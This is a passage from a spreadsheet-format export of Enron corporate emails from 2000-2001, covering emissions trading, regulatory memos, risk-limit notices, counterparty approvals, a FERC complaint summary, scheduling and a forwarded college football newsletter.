today.  This is to move the curves to better reflect the current market.  _x000D_
This hit will stay in the Coal group but will be removed from its P/L from a _x000D_
performance measurement standpoint.  Now that the curves are corrected I _x000D_
expect a focus on building our emmisions trading business in the following _x000D_
ways:_x000D_
_x000D_
1.  Understanding the fundamentals._x000D_
2.  Taking advantage of structural shifts that we forecast._x000D_
3.  Building more liquidity and being the primary market maker._x000D_
4.  Developing new traders._x000D_
_x000D_
Thanks_x000D_
 _x000D_
John</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 08:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.steffes@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Re: Memo on policy paper conclusions and staff call</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Seabron Adamson" &lt;seabron.adamson@frontiereconomics.com&gt; on 05/21/2001 _x000D_
09:19:19 AM_x000D_
Please respond to &lt;seabron.adamson@frontier-economics.com&gt;_x000D_
To: &lt;Richard.Shapiro@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Memo on policy paper conclusions and staff call_x000D_
_x000D_
_x000D_
_x000D_
Rick:_x000D_
_x000D_
Please find attached a short memo regarding last week's call with Jim and_x000D_
the Enron RTO team. It also has some thoughts on what we might cover with_x000D_
Steve K. at 2:00 p.m. CDT today._x000D_
_x000D_
Some other time I would like to have a quick chat about how we move to the_x000D_
next step with the RTOs. It strikes me that there has been a real absence of_x000D_
cleare-headed thinking in the stakeholder chin-wagging sessions. If FERC_x000D_
will not impose a single design - on an abbreviated timeframe - is there_x000D_
another way to add some economic logic into the equation?_x000D_
_x000D_
_x000D_
Speak to you later..._x000D_
_x000D_
Seabron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_x000D_
 - 01-05-21 SA Memo to Rick Shapiro on RTO conference call.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 00:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rebecca.carter@enron.com', 'kelly.johnson@enron.com'})</t>
  </si>
  <si>
    <t>Letter to Board</t>
  </si>
  <si>
    <t xml:space="preserve">Rebecca and Kelly:  I've attached the letter from Ken to the Board notifying _x000D_
them that we were named "Most Innovative Company in America" for the sixth _x000D_
consecutive year.  Ken has approved the letter and it contains his electronic _x000D_
signature.  I've formated the letter and left room for names and addresses.  _x000D_
You can adjust as needed._x000D_
_x000D_
Please mail it at your earliest convenience.  Thanks._x000D_
_x000D_
Mary_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 04:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ED&amp;F Man NDA</t>
  </si>
  <si>
    <t xml:space="preserve">Tana:_x000D_
_x000D_
Please finalize the attached NDA for execution._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Leslie_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 12:52:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ted.murphy@enron.com', 'rick.buy@enron.com', 'frank.hayden@enron.com', 'mark.frevert@enron.com', 'greg.whalley@enron.com', 'cassandra.schultz@enron.com', 'kenneth.lay@enron.com', 'david.port@enron.com'})</t>
  </si>
  <si>
    <t>RE: ERV Notification: Violation/Notification Memo 10/16/01</t>
  </si>
  <si>
    <t>The notification is now published to the Executive Reports Viewer website - erv.corp.enron.com,  and is available for viewing._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Thibodeaux, Kenneth  _x000D_
Sent:	Wednesday, October 17, 2001 10:24 AM_x000D_
To:	Buy, Rick; Frevert, Mark; Lay, Kenneth; Port, David; Whalley, Greg; Schultz, Cassandra; Murphy, Ted; Hayden, Frank_x000D_
Cc:	Wilson, Shona; Abel, Chris; Allison, John; Wallace, Cassi_x000D_
Subject:	RE: ERV Notification: Violation/Notification Memo 10/16/01_x000D_
_x000D_
We are having technical difficulties with the ERV website at this time.  We will send another notification to you as soon as the problem has been resolved and the notification is listed on the website._x000D_
_x000D_
Notification: Concentration Americas Natural Gas Total P&amp;L_x000D_
_x000D_
Limit: $100 million_x000D_
DPR report P&amp;L: $119 million_x000D_
_x000D_
Explanation:  The loss was a result of increased prices on short positions.  Specifically:_x000D_
-Positions: _x000D_
Short positions in U.S. Gas (341 BCF), Canada Power Gas (214 BCF), and Cross Commodity Gas (214 BCF)_x000D_
- Prices:_x000D_
NYMEX prices increased $.21 on news of Solomon Smith Barney's revised Winter 01-02 forecast_x000D_
Cash prices increased $.15-$.30 across all regions of the country</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:49:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'craig.dean@ey.com', 'dgagliardi@reliantenergy.com'})</t>
  </si>
  <si>
    <t>FW: True Orange, November 26, 2001, Part 1 of 4</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	TruOrange@aol.com@ENRON  _x000D_
Sent:	Monday, November 26, 2001 10:05 AM_x000D_
To:	TruOrange@aol.com_x000D_
Subject:	True Orange, November 26, 2001, Part 1 of 4_x000D_
_x000D_
Jerry Scarbrough's True Orange_x000D_
The Newsletter for the True Texas Longhorn Faithful_x000D_
_x000D_
Volume 12, No. 6, November 26, 2001_x000D_
_x000D_
(Editor's Note - I'm sending this in four pieces today because it is a bigger_x000D_
issue than usual due to the spring recruiting in basketball, track and_x000D_
softball.)_x000D_
_x000D_
Volume 12, No. 6, November 26, 2001_x000D_
_x000D_
 Benson, Defense Stifle Ags; Huge Upsets Propel_x000D_
Horns Into Big 12 Title Game Against Colorado_x000D_
_x000D_
As Longhorn defensive coordinator Carl Reese noted, it was an old-fashioned,_x000D_
rock-em, sock-em game in College Station before a state record football crowd_x000D_
of 87,555 Friday, and Texas won it with a gritty defense and two late_x000D_
touchdowns by outstanding freshman RB Cedric Benson._x000D_
After taking the 21-7 victory, head coach Mack Brown congratulated the team_x000D_
on its fine 10-1 season and said he wasn't worried about the Bowl_x000D_
Championship Series (BCS) "because we'll be in it."_x000D_
I don't know if had a crystal ball, but immediately after the Longhorns'_x000D_
expected victory, top-rated Nebraska was humiliated, 62-36, by Colorado, and_x000D_
the next day No. 3 Oklahoma, a 27-point favorite lost at home to Oklahoma_x000D_
State, 16-13. It was only the fifth time OSU has won at OU._x000D_
The good news is those games moved Texas up to the No. 3 spot in both major_x000D_
polls and put the Longhorns back in control of their own destiny for the_x000D_
first time since that 14-3 loss to OU back in October._x000D_
Texas plays Colorado Saturday at 7 p.m. in Irving's Texas Stadium for the Big_x000D_
12 Championship and an automatic berth in one of the four BCS bowls, possibly_x000D_
even the Rose Bowl in the national title game._x000D_
But the bad news is that a loss to the stampeding Buffaloes would knock the_x000D_
Longhorns out of the BCS mix._x000D_
Brown and his players are tickled orange, however, at the chance to play for_x000D_
the conference championship._x000D_
"The BCS isn't an issue today," Brown said Saturday after the huge upset in_x000D_
Norman. "The Bowl game isn't an issue today."_x000D_
"We said we needed to get to the championship game," he said, "but once you_x000D_
get there, you need to win. After that, you just look up and try to figure_x000D_
out where you are."_x000D_
"People have been asking us about the BCS for five weeks," Brown said._x000D_
"Obviously we said we needed to wait until the end (of the season) and the_x000D_
end's not even near where it should be."_x000D_
"People haven't given us or Colorado a chance to be in this game for five_x000D_
weeks. To our kids' credit and to Colorado's kids credit, they kept working_x000D_
hard and now they are in this game."_x000D_
The coaches and players have to forget the Aggie game and get ready for the_x000D_
Buffaloes, but we can enjoy it just a little longer._x000D_
This was a game where the defenses weren't going to give up a lot, but the_x000D_
Longhorns got an early special teams touchdown when CB Roderick Babers_x000D_
blocked a punt and WR Tony Jeffery scooped it up and scored._x000D_
The Aggies tied it on a 27-yard drive after a fine punt return in the third_x000D_
quarter when they had the benefit of the strong wind, which was around 15_x000D_
miles per hour with frequent gusts to 25 or 30 miles per hour._x000D_
But Nathan Vasher made a couple of good punt returns and Texas started the_x000D_
pivotal fourth quarter with the wind and a drive into Aggie territory that_x000D_
changed the field position for the rest of the game._x000D_
After a short Aggie punt midway through the period, the Longhorns rode_x000D_
Benson's strong legs to a touchdown, then they got another from the powerful_x000D_
freshman after Everick Rawls' interception in the final two minutes._x000D_
Here, briefly, is how the game went_x000D_
First Quarter_x000D_
Texas won the toss and deferred. After each defense got a quick stop, the_x000D_
Aggies were stymied a second time and Babers blocked the punt and Jeffery_x000D_
returned it 23 yards for a Longhorn TD and a 7-0 lead with 7:44 left. Another_x000D_
three-and-out by the Aggies, followed by a shanked punt, gave Texas_x000D_
possession at the UT 47. The Horns made one first down and Dusty Mangum_x000D_
missed a 49-yard field goal try. Defenses dominated the quarter.  A&amp;M led in_x000D_
first downs, 3-2, and in total yardage, 40-25._x000D_
Second Quarter_x000D_
A shanked punt by UT's Brian Bradford set the Aggies up at the Longhorn 47._x000D_
A&amp;M couldn't move, but punted the ball dead at the UT 7. The Longhorn_x000D_
offense, which had done little with the stiff wind, couldn't move into it,_x000D_
and Bradford's 30-yard punt, a good one into the wind, gave A&amp;M possessiion_x000D_
at the UT 39. The Aggies made a first  down at the 26 before stalling. Cody_x000D_
Scates missed a 43-yard field goal attempt. An interception of a long pass at_x000D_
the UT 5 by safety Ahmad Brooks with just under five minutes left in the half_x000D_
finally pumped a little life into the Longhorn offense, which drove to_x000D_
midfield and killed all but 50 seconds of the half before stalling. Texas had_x000D_
a 7-5 lead in first downs and a 92-60 lead in total offense at intermission._x000D_
Third Quarter_x000D_
Texas got the ball going into the wind to start the second half. The Horns_x000D_
couldn't move and punted. A&amp;M's Mickey Jones almost tied the game on the punt_x000D_
return, starting right, then racing left and going down the sideline for 37_x000D_
yards before being pushed out of bounds at the UT 27. The Aggies hit a pass_x000D_
to the UT 8, then 220-pound RB Keith Joseph took over, powering to the left_x000D_
to the 4, then taking a pitchout to the right for the TD to tie the game with_x000D_
10:41 left. The Horns came right back with a good drive to midfield, sparked_x000D_
by two passes from Simms to TE Bo Scaife. But, facing fourth down with an_x000D_
inch or two needed, a lineman flinched and UT drew a 5-yard penalty and had_x000D_
to punt._x000D_
Fourth Quarter_x000D_
Benson, who had been stymied throughout the first three quarters, got 5 and_x000D_
then 24 yards on his first two carries of the final period, getting the Horns_x000D_
to the Aggie 45. But the UT offense stalled again and Bradford's punt was_x000D_
killed at the Aggie 8. The Texas defense force a quick punt into the wind and_x000D_
Vasher alertly ran up and caught the short punt at the A&amp;M 40 and returned it_x000D_
to the 35. Benson got loose for 12 to the 23, then got 5 and 2 to the 16. On_x000D_
third and 3, Simms hit Scaife coming across the middle  to the A&amp;M 5. Benson_x000D_
powered through the right side for the TD on the next play. Mangum's kick put_x000D_
UT on top, 14-7, with 7:22 left. Rawls interception at the A&amp;M 27 and return_x000D_
to the 12 with 1:59 left set up the final UT touchdown. Benson got 1, then_x000D_
ran through a big hole and powered through two defenders for the TD and the_x000D_
final 21-7 count._x000D_
_x000D_
Rose Bowl Road Full of Thorns_x000D_
_x000D_
 If you still have some hope the Longhorns will be playing for the national_x000D_
title in the Rose Bowl on January 3, here's what it would take:_x000D_
1. A victory over Colorado Saturday._x000D_
2. A loss for either Florida or Miami and probably a loss for Oregon, too,_x000D_
because the Ducks were ahead of Texas in the last BCS ratings. The Horns have_x000D_
to be No. 1 or No. 2 in the final BCS ratings on December 9 to get to_x000D_
Pasadena._x000D_
Miami plays at Virginia Tech Saturday, while Florida hosts Tennessee and_x000D_
Oregon also is at home against Oregon State_x000D_
If Florida beats Tennessee, the Gators would have to win the SEC title game_x000D_
on December 8 against the winner of Saturday's game between Auburn and LSU._x000D_
Since that game is in Baton Rouge and Auburn's outstanding running back broke_x000D_
his shoulder two weeks ago, LSU probably will be the Gators' Dec. 8 opponent._x000D_
It's asking a lot for two of those three teams to lose a game, but after the_x000D_
games in Boulder and Norman last weekend, anything is possible._x000D_
_x000D_
Longhorn Notes_x000D_
_x000D_
* Saturday's meeting between Texas and Colorado will be the sixth Big 12_x000D_
Championship Game. Texas won the inaugural title game in 1996, Nebraska_x000D_
triumphed in 1997 and 1999, Texas A&amp;M won the title in 1998 and Oklahoma took_x000D_
the crown in 2000. If Texas wins Saturday, the Longhorns will join Nebraska_x000D_
as the only two-time champs._x000D_
* Since the Big 12 Championship Game counts in statistical manners, RB Cedric_x000D_
Benson has a great chance to become the first Longhorn freshman to rush for_x000D_
more than 1,000 yards in a season. He has 974 yards and ranks second among_x000D_
Longhorn freshmen behind Ricky Williams, who rushed for 990 yards in 1995._x000D_
* Benson broke the UT freshman record for touchdowns with his pair of_x000D_
fourth-quarter rushing scores. He has 12 touchdowns on the season  - 11_x000D_
rushing and one on a shovel pass reception  -breaking the record of 10 set by_x000D_
Roy Williams last year._x000D_
* Benson had only 12 yards on 14 carries after three quarters Friday in_x000D_
College Station, but he finished strong, carrying 13 times for 67 yards and_x000D_
scoring the Longhorns' only two offensive touchdowns in the final period. He_x000D_
finished with 27 carries for 79 yards and two touchdowns._x000D_
* The UT defense is allowing 77.4 yards a game rushing, the fourth lowest_x000D_
average in school history, trailing only teams from the old one-platoon days_x000D_
when defense dominated and 7-0 games were the norm. The only lower season_x000D_
averages were 57.5 in 1942, 65.9 in 1941 and 69.5 in 1943._x000D_
* This is Texas' first 10-win season since 1995, which was the last time_x000D_
Texas won at Kyle Field. The Longhorns have had 15 teams with 10 or more wins_x000D_
in a season, but this is just the third since 1983._x000D_
* Texas evened the series in College Station 21-21-2.UT leads the overall_x000D_
series, 69-34-5_x000D_
* The Texas defense has held its last eight opponents to less than 300 yards_x000D_
of total offense. Texas A&amp;M gained 165 yards, which was the fourth time Texas_x000D_
has held its opponent to less than 200 yards in 2001._x000D_
* Sophomore WR B.J. Johnson extended his streak of consecutive games with a_x000D_
catch to 23, a UT record to start a career and the third-longest in school_x000D_
history. Mike Adams holds the school record of 26, which he set from 1995-96._x000D_
* Sophomore WR Roy Williams has caught a pass in 20 straight games. He had_x000D_
eight receptions o move into sixth place on the UT career receptions list_x000D_
(102). He also moved into second place on UT's single-season list with 62_x000D_
receptions._x000D_
* Junior QB Chris Simms passed for 138 yards, giving him 2,473 yards on the_x000D_
season and placing him second on the UT single-season chart. Major Applewhite_x000D_
holds the UT record with 3,357 yards in 1999._x000D_
* Senior LB D.D. Lewis tied the UT record with his 49th straight start. He_x000D_
now shares the record with Dan Neil (1993-96)._x000D_
* Freshman WR Tony Jeffery scored his second career touchdown when he_x000D_
returned Rod Babers' blocked punt 23 yards in the first quarter. His first_x000D_
score came against Houston when he had a 17-yard touchdown reception. Texas_x000D_
has returned two blocked punts for touchdowns in 2001 - the first was by_x000D_
sophomore safety Phillip Geiggar against New Mexico State._x000D_
* Junior CB Rod Babers blocked a punt for the second straight game. It was_x000D_
his second blocked kick of the season and the fifth for Texas as a team._x000D_
Texas has blocked seven kicks overall this season._x000D_
* Friday's victory marked UT's eighth straight road victory and 12th in its_x000D_
last 14 games._x000D_
* Texas has produced seven defensive or special teams scores in 2001,_x000D_
including four in the last three games._x000D_
* The Texas defense has had an interception in six straight games and eight_x000D_
of 11 games this season._x000D_
* Texas is 28-1 when scoring first, 34-5 when leading at halftime and 33-0_x000D_
when outrushing its opponent during the Mack Brown era. The Horns are 4-12_x000D_
when they are outrushed during the Brown era._x000D_
_x000D_
Subscribe To The E-Mail/Fax To Get Year-Round Football_x000D_
&amp; Recruiting Scoops !_x000D_
Save Big As_x000D_
An Internet Subscriber !_x000D_
Whether you live close to Austin or far away, the True Orange E-Mail/Fax_x000D_
Service is the way to keep up with Longhorn football and Longhorn recruiting_x000D_
- instantly. It has about 110 to 120 timely e-mail/faxes a year, primarily_x000D_
about football and football recruiting.  To  subscribe, send your check to_x000D_
True Orange, Box 26530, Austin, Texas 78755, and copy or clip the coupon_x000D_
below and fill in the blanks. If you want it mailed, or by E-Mail, just_x000D_
include the right numbers._x000D_
_x000D_
o I'm enclosing $99 for the 99-fax package for the next year_x000D_
o I'm enclosing $130 (an $11 saving) to renew my subscription to True Orange_x000D_
and to subscribe to the 99 faxes._x000D_
o I'm enclosing $79 for the 99-fax package for the next year by E-Mail (a $20_x000D_
saving)_x000D_
o Here's  $110 to renew my subscription to True Orange and to subscribe to_x000D_
the 99 faxes by E-Mail (a $31 saving)_x000D_
o Here's  $99 to subscribe to True Orange via the Internet  and to subscribe_x000D_
to the 99 faxes by E-Mail (a $42 saving)_x000D_
_x000D_
Name_x000D_
_x000D_
Fax No._x000D_
(or E-Mail or mailing address)_x000D_
_x000D_
900 Number Updated Daily_x000D_
_x000D_
I update my 900 number every day with football and football recruiting news._x000D_
The number is 1-900-288-8839. It costs $1.59 a minute. You must be 18 or_x000D_
older to call._x000D_
_x000D_
Texas, the BCS and the Bowl Situation_x000D_
_x000D_
Forget calculating the Longhorns' BCS standings and their chances of getting_x000D_
into a BCS bowl._x000D_
It all got simplified when Nebraska and Oklahoma both lost last weekend._x000D_
Now, two improbable division winners - Texas in the South and Colorado in the_x000D_
North - will meet Saturday for the Big 12 Championship and the automatic BCS_x000D_
berth that goes with it._x000D_
It would take another big round of upsets for Texas to make it to the_x000D_
National Championship Game in the Rose Bowl, but a second victory over the_x000D_
Buffs Saturday would guarantee the Horns a BCS bowl bid._x000D_
It could be the Fiesta Bowl in Phoenix, which normally gets the Big 12_x000D_
champion if the Big 12 champ isn't in the national title game._x000D_
But the BCS bowls can trade things around, and the Rose Bowl, normally the_x000D_
meeting place for the Big 10 and Pac 10 champs, won't have a team from either_x000D_
of those conferences in it unless Oregon gets lucky._x000D_
So, some Fiesta Bowl folks would like to turn their bowl into "Rose Bowl II"_x000D_
by inviting the Big 10 and Pac 10 champs._x000D_
They reportedly have been talking to the Sugar Bowl folks about switching_x000D_
teams, and the New Orleans folks reportedly would love to have the Longhorns,_x000D_
assuming they take care of business Saturday in Texas Stadium._x000D_
There also is an outside chance the Orange Bowl will get in on the swapping,_x000D_
so the Horns could wind up there._x000D_
And what if Colorado pulls another big upset Saturday? Then we hope all of_x000D_
you love the Cotton Bowl, because that is where Texas will be when the new_x000D_
year begins._x000D_
The new BCS standings will be issued Monday, but, for the first time since_x000D_
that all started, it really won't matter where Texas stands because a win_x000D_
Saturday will guarantee a BCS bowl berth and a loss will guarantee there_x000D_
won't be a BCS bowl berth for Texas.</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Sending hourly indexes</t>
  </si>
  <si>
    <t>I'm sorry for whatever is causing the difficulty for the night desk sending_x000D_
us the hourly trades that day. I realize how frustrating it must be to take_x000D_
the time to send it only to hear it did not show up for some reason._x000D_
_x000D_
Attached is a template, which includes 5 hubs: AEP, Cinergy, Entergy/SPP,_x000D_
ComEd, and TVA. The last 2 are next on our list for expansion, and our plan_x000D_
is to start them at some point during this first quarter. Please include any_x000D_
hourly deals for these hubs, too, if you have any. The template can then be_x000D_
emailed to tradersnewsindexes@ipgdirect.com and a link to that email address_x000D_
is in the template for your convenience._x000D_
_x000D_
Thank you again for all your time, and please let me know if there is_x000D_
something I can do to help you all._x000D_
_x000D_
_x000D_
Ellen Clardy, Ph.D._x000D_
Power Market Analyst_x000D_
TradersNews_x000D_
713/647-6603_x000D_
ellen.clardy@ipgdirect.com_x000D_
_x000D_
 - 5ndxtemplate.xls</t>
  </si>
  <si>
    <t>Fri, 22 Jun 2001 07:35:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mtg: Caroline Abramo - NY business</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Abramo, Caroline  _x000D_
Sent:	Friday, June 22, 2001 9:33 AM_x000D_
To:	Hillis, Kimberly_x000D_
Subject:	RE: SCHEDULE_x000D_
_x000D_
hi kim.. just an update on the NY business - i only need a 1/2 hour- 45 min.._x000D_
thanks,_x000D_
ca_x000D_
_x000D_
_x000D_
From:	Kimberly Hillis/ENRON@enronXgate on 06/22/2001 09:30 AM_x000D_
To:	Caroline Abramo/Corp/Enron@Enron_x000D_
cc:	 _x000D_
_x000D_
Subject:	RE: SCHEDULE_x000D_
_x000D_
what is the subject matter and how long do you need - will it just be you?_x000D_
_x000D_
k_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Abramo, Caroline  _x000D_
Sent:	Friday, June 22, 2001 9:30 AM_x000D_
To:	Hillis, Kimberly_x000D_
Subject:	SCHEDULE_x000D_
_x000D_
Kim- can I get on John's schedule next week?_x000D_
_x000D_
Thanks,_x000D_
Caroline_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 12:09:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: August 17th Power Marketing Conference Call Agenda</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Pls update my calendar._x000D_
 -----Original Message-----_x000D_
From: 	"Michael Reddy" &lt;Mreddy@epsa.org&gt;@ENRON [mailto:IMCEANOTES-+22Michael+20Reddy+22+20+3CMreddy+40epsa+2Eorg+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, August 14, 2001 1:24 PM_x000D_
To:	acomnes@enron.com; Hawkins, Bernadette; Nersesian, Carin; Nicolay, Christi L.; Fulton, Donna; Scheuer, Janelle; jhartso@enron.com; Shelk, John; Jsteffe@enron.com; Noske, Linda J.; Robertson, Linda; Alvarez, Ray; Shapiro, Richard; Novosel, Sarah; sscott3@enron.com; Mara, Susan; Hoatson, Tom_x000D_
Subject:	August 17th Power Marketing Conference Call Agenda_x000D_
_x000D_
MEMORANDUM_x000D_
_x000D_
_x000D_
TO: Regulatory Affairs Committee_x000D_
       Power Marketing Working Group_x000D_
_x000D_
FROM: Jim Steffes, Regulatory Affairs Committee Chair_x000D_
            Bob Reilley, Power Marketers Working Group Chair_x000D_
            Julie Simon, Vice President of Policy_x000D_
_x000D_
DATE: August 14, 2001_x000D_
_x000D_
RE: August 17th Power Marketing Conference Call_x000D_
      ?Friday, 11:30 a.m. (EDT) - NOTE DATE AND TIME_x000D_
       CHANGE_x000D_
_x000D_
Due to the ongoing FERC RTO settlement conferences, we will hold this week's Power Marketers Working Group conference call on Friday, August 17th, at 11:30 A.M. (EDT).  To access the call, dial 1-800-937-6563.  Ask for the Julie Simon/EPSA Call.  An agenda is outlined below._x000D_
_x000D_
August 17, 2001 Conference Call Agenda_x000D_
_x000D_
?  California_x000D_
   ?  Rehearing of Refund Order_x000D_
      ?  Draft to follow_x000D_
   ?  California Refund Prehearing Conference_x000D_
   ?  PNW Refund Case_x000D_
_x000D_
?  New York_x000D_
_x000D_
?  Alliance_x000D_
_x000D_
?  NE RTO Settlement Conference_x000D_
_x000D_
?  SE RTO Settlement Conference_x000D_
_x000D_
?  GISB Meeting_x000D_
_x000D_
?  EPSA Legislative &amp; Regulatory Committees Joint Meeting on NAERO_x000D_
   Legislation: August 20th_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Mar 2000 09:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.gillette@enron.com', 'sheri.thomas@enron.com', 'frank.davis@enron.com'})</t>
  </si>
  <si>
    <t>Counterparty Approvals for 3/24/00, 3/27/00 and 3/28/00</t>
  </si>
  <si>
    <t xml:space="preserve">Some notes on the attached lists:_x000D_
_x000D_
3/24/00 List - the first two counterparties have no Legal changes per my _x000D_
earlier approvals._x000D_
_x000D_
3/27/00 List-we just got the financial master in signed and they cannot do _x000D_
pulp &amp; paper and weather under it._x000D_
Ambac Assurance Corp. and Salomon Smith Barney AAA Energy Fund - I have a _x000D_
temporary "no" for them for financial products until I get more information _x000D_
on them to determine what they are and what they can do.  Per Credit, AMBAC _x000D_
only wants to trade credit derivatives, and Salomon Smith Barney is currently _x000D_
not an eligible swap participant and cannot trade any financial.  If we get a _x000D_
parent guaranty in that can change their eligible swap participant status.  _x000D_
In the meantime I am trying to get more information on the fund to determine _x000D_
what if anything they can do._x000D_
_x000D_
3/28/00 List-I previously had them shut down for all financial but am opening _x000D_
them up.   I sent an email about that earlier this week._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 23:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lia.halstead@enron.com'})</t>
  </si>
  <si>
    <t>Re: Egan</t>
  </si>
  <si>
    <t xml:space="preserve">You are welcome and have a nice day!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lia Halstead@ENRON_x000D_
01/27/2001 02:14 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Egan  _x000D_
_x000D_
Thanks for the info._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 15:21:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'teb.lokey@enron.com', 'robert.kilmer@enron.com', 'stanley.horton@enron.com', 'steve.kirk@enron.com', 'kay.miller@enron.com', 'kimberly.watson@enron.com', 'rod.hayslett@enron.com', 'joe.hartsoe@enron.com', 'danny.mccarty@enron.com'})</t>
  </si>
  <si>
    <t>SoCalGas Complaint (Message from Greg Porter)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
MESSAGE FROM GREG PORTER_x000D_
_x000D_
_________________________________________________x000D_
As you know, Transwestern filed a complaint against Southern California Gas Company (SoCalGas) at the Federal Energy Regulatory Commission on September 28, 2001.  The complaint asked FERC to find SoCalGas' refusal to pay the tariff commodity rate constitutes a violation of Transwestern's tariff and the 1995 Global Settlement.  SoCalGas filed an Answer on October 18, 2001.  In summary, SoCalGas' Answer stated:_x000D_
_x000D_
1.	SoCalGas did not affirmatively agree to pay the stated tariff rate during the Global Settlement.  _x000D_
_x000D_
2.	The commodity charge SoCal has been paying is consistent with the course of performance/conduct prior to, and after, the Global Settlement.  _x000D_
_x000D_
3.	Since the Global Settlement has been in effect, SoCalGas has relied on the commodity/usage charges that Transwestern has billed.    _x000D_
_x000D_
4.	SoCalGas claims they had been paying the appropriate rate and that Transwestern failed to include the correct rate in its tariff; such omission has created ambiguity and any ambiguity should be construed against the drafter of the tariff, Transwestern._x000D_
_x000D_
5.	If the Commission disagrees with SoCalGas and declines to reject the complaint outright, any retroactive billing adjustment should be limited to a six-month period._x000D_
_x000D_
6.	SoCalGas admits that a retroactive billing adjustment for the escalation factor for six months is reasonable and an escalation factor going forward for the remaining term of its Contract No. 8255 is appropriate._x000D_
_x000D_
In addition to the foregoing statements, SoCalGas provided that it, like Transwestern, was interested in resolving this matter through ADR.  Accordingly, we will be coordinating with SoCalGas and FERC's ADR group to explore possible ADR procedures._x000D_
_x000D_
We will advise as new developments warrant.  In the meantime, should you have any questions regarding this matter please do not hesitate to contact me at (402) 398-7406 or Maria Pavlou at (402) 398-7097.</t>
  </si>
  <si>
    <t>Wed, 21 Jun 2000 00:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: CGAS Storage</t>
  </si>
  <si>
    <t xml:space="preserve">We only took 80% of what we could, so we can increase by Market Zone delivery,_x000D_
or not. We have advised any new buyer of the options and are keeping them_x000D_
informed if we are forced to make a move, as in the case of the 15,000 of_x000D_
capacity on TCO. We are being conservative and keeping everyone informed._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris.Germany@enron.com on 06/20/2000 04:59:21 PM_x000D_
Please respond to Chris.Germany@enron.com_x000D_
_x000D_
To: Jeffrey Porter/CES/ColumbiaGas@COLUMBIAGAS_x000D_
cc: Scott.Goodell@enron.com_x000D_
Subject: Re: CGAS Storage_x000D_
_x000D_
_x000D_
How big of an adjustment can you make as a percentage and are you guys_x000D_
looking at that adjustment?   OR, are you letting the buyer know this_x000D_
option exists and you just hope its not your problem by then (that's my_x000D_
guess)?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
jporte1@columbiaenergygroup.com on 06/20/2000 02:53:42 PM_x000D_
_x000D_
To:   " - *Chris.Germany@enron.com" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:   " - *Scott.Goodell@enron.com" &lt;Scott.Goodell@enron.com&gt;_x000D_
Subject:  Re: CGAS Storage_x000D_
_x000D_
_x000D_
Yes, we can adjust by 10/15. If we add, must pay retro to 4/1 and if_x000D_
reduce, we_x000D_
may not get any $ back._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris.Germany@enron.com on 06/20/2000 02:13:20 PM_x000D_
Please respond to Chris.Germany@enron.com_x000D_
_x000D_
To: Jeffrey Porter/CES/ColumbiaGas@COLUMBIAGAS_x000D_
cc: Scott.Goodell@enron.com_x000D_
Subject: CGAS Storage_x000D_
_x000D_
_x000D_
_x000D_
Does CES have the ability to adjust the storage MSQ in Sep or Oct?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 00:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Susan M Scott/HOU/ECT on 11/07/2000 08:22 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Kyle Etter" &lt;kyle_etter@hotmail.com&gt;                           _x000D_
11/07/2000 12:51 AM_x000D_
	_x000D_
_x000D_
To: Susan.M.Scott@enron.com_x000D_
cc:  _x000D_
Subject: Re:_x000D_
_x000D_
_x000D_
_x000D_
First off I hope your still not at work when I send this._x000D_
_x000D_
Secondly it would be cool to meet earlier in the week but I'm in San Antonio_x000D_
and will be until Friday.  I will be driving to Houston on Friday morning to_x000D_
do some packing and then the parents will be coming up on Saturday morning_x000D_
to help with the final move.  I will pretty much leave it in your ball park_x000D_
